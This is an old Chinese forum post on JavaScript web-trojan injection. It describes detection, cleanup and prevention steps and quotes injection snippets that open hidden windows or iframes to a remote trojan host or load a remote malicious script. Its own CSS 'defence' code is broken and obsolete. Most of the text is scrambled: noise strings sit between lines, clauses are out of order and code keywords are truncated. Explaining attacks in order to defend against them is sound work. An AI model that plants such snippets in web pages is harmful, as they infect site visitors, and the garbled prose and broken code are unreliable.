搜索
查看: 6550|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

4 H! d3 g+ x* h% f0 w

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

) h D5 ]5 n0 r Y6 P8 |$ J

IFRAME 和 JS 脚本挂马。

) Q" ]" ?2 ]& k& \+ ^' u. j

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

+ H! F0 E/ U i

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

+ u. h- c& s+ J- G# Y

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

1 ^/ @; | @+ _$ |( n+ y

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

( T" |! r+ V2 Q O5 [$ D9 B+ K4 @

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

4 u7 n$ m& M' |1 U6 A3 \

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

. I. B5 J& b" z; b) B

。一千多位会员的 ID

/ j/ p6 L4 W6 N! |" G% N

2: 如何检测网页是否被挂马。

, r7 b" r5 `; O. b- q" Z

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

% w7 E8 |( X: F4 q

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

# K$ {$ @% p. Y+ ^/ \6 y

因素。
2 googl 检测。>

3 T! y+ e; Q0 A* \

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

7 \# W B! G* v4 | q$ P* N3 t

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

) @* X7 {8 P! E

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

g$ |6 w! ^/ G K3 w

. @$ p' r, w! G1 M$ {

3: 如何清除网页木马。

; B4 X6 M0 l1 b; ]+ W8 x! U. ?

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

) C# @4 \# t( ?5 Q; R8 i

入源文件把相关的网页挂马种类的可疑代码删除。

! r) B* p6 [3 n2 T9 v" {

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

4 t) G/ P1 x) X# B

悉。>

! S1 P6 W3 r0 Q) G

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

- u& C0 m1 T) T: R

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

' \/ v9 i7 Z5 a

2 保证你所使用的顺序及时的更新。

9 [& L7 K) l! r1 c% q! c# D! u

3 不要在前台网页上加注后台管理程序登陆页面的链接。

6 A9 Y- s" `9 }$ u7 ~) z8 o

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

1 V2 n* V9 [$ r- ?8 d* I% r

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

# |# L; J# Q4 k% v4 B. ]) z/ i

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

; n1 ]: u# Q" u$ K& B* f2 q

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

. U+ c/ L1 C8 a `9 \

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

" N; h( |. S. B% L. |! Z

6 D4 j. D+ {5 P0 D4 ^! r6 Y# Z

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

- |: c) B& b4 T- x3 I+ w: n2 L: q

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

' X0 \% w: O$ w+ }8 l

JS 挂马溯源

; B" k$ z9 c D9 D) d. w* X2 C

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

0 T; Q$ O7 z A0 C$ X" W# h

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

6 m V8 t% u7 m' G3 d

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

+ U1 _2 [, q; B/ W+ x

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

6 A$ c0 i S# M' s* _

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

+ l2 z y7 I0 I2 O

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

, L2 g6 x0 @. }% B( P

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

4 O5 L% L2 g' ]9 {

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

7 l+ e4 X3 m2 ?& X8 [. G8 r$ ?

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

# h8 g5 T3 ]$ _* v3 C/ M+ x3 ^

脚本在工作中会有很大的协助。

- e) t R5 h A2 F; \; d

挂马原理一点通

0 f* r- c B& ^

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

! `8 N- G5 _& c1 c1 @$ z

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

9 K5 }# ~' g9 X3 H

无从区分木马在何处。

5 c" c3 q4 M; z! |8 `

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

) E2 u; {; F! H! b) R$ S' [

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

& f4 o5 G3 M% a6 }2 ?- q

容易蒙混过关,导致木马久杀不绝。

, Z/ V# ] |: |# T

JS 挂马攻防实录

7 S4 j: o& |8 C: l6 Y Q! K0 |/ Y

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

! y/ F( J8 G. V9 C

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

\' r: m7 f- f- E# U9 }

这种方法使用的关键代码如下:

# u7 Y3 k6 X1 z2 w5 g6 S& G3 S

"",  window.open "http://www.v404.cn/ 木马

4 ? X1 F/ U) U2 e- t& D, h2 u

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

$ W/ q* @* |* c6 l0 \

( [( k" S3 V! F L

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

7 q O% ?8 _( \4 [# ^' |

但是设置为 0 后,可能会出现恶意代码不运行的情况。

# p$ N- f5 g9 [% i7 u

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

& y H! ~9 I! ~# P2 q- o

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

; d! M. W7 B2 c

7 J2 j! k' {1 _9 C6 e( O5 S7 V6 y

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

; u7 B- u; F: B

$ ?0 t& q M s/ D% h

或者

$ H# \) t0 z( }* K$ n

document.writ "<div style='display:none'>"

& Q- x2 s; P* F$ ~) n& R; g

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

( p( z+ ]; J; W8 W, {

document.writ "</div>"
 

{. K1 ~ A7 R# }: r

. h/ a5 `% s4 A: O0 s

就成功地将木马挂到对方的网页中了

* S' d0 k9 c1 E& S

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

$ L) g6 {- E5 m5 c3 V( Q- d

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

) Y$ ^8 B q: t! p

或者:

2 U) T( |2 x/ F' T: w$ O7 z+ V

<ifram src="vbscript:[ 挂马脚本 ]">

. @" }3 \+ O8 A

% |0 N- X; b6 m6 p


等等 …

R' u& F+ [; [2 s

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

9 h* I+ |+ [4 p6 C

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

/ I! S7 R! p# A8 W

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

& z* A( U5 H, G; A: n6 p% ^4 N

;}

5 I( }7 h7 B! L* Y8 S1 T5 y4 g

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

2 a$ N8 L6 v' s0 U5 M

7 @9 I$ _# g8 S$ b. _

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

+ k5 ~9 F5 W; w

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

4 t0 q$ t+ v" j/ p0 q. [- {

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

0 J9 P% h9 s9 R3 h

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

' }" Y' m3 F& J! V

<title> 让 JS 挂马中止的 CSS 代码 </title>

! O7 p" @9 C' F1 W; g

<styl type="text/css" id="shudoo">

) x( ~- b0 e0 _8 ]3 X8 E1 d0 _0 J

/*<![CDATA[*/

' u6 d, W9 c) \$ w, \ P8 j _

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

7 w P# y, ^' m2 |

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

' g$ {( e$ O& n! e

/*]]>*/

' Q: C8 d" k: h. k& ] N3 v+ m* ]. F

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 马上注册

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|小黑屋|手机版|Archiver|虾皮社区 ( 鲁ICP备13006813号-1 ) 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表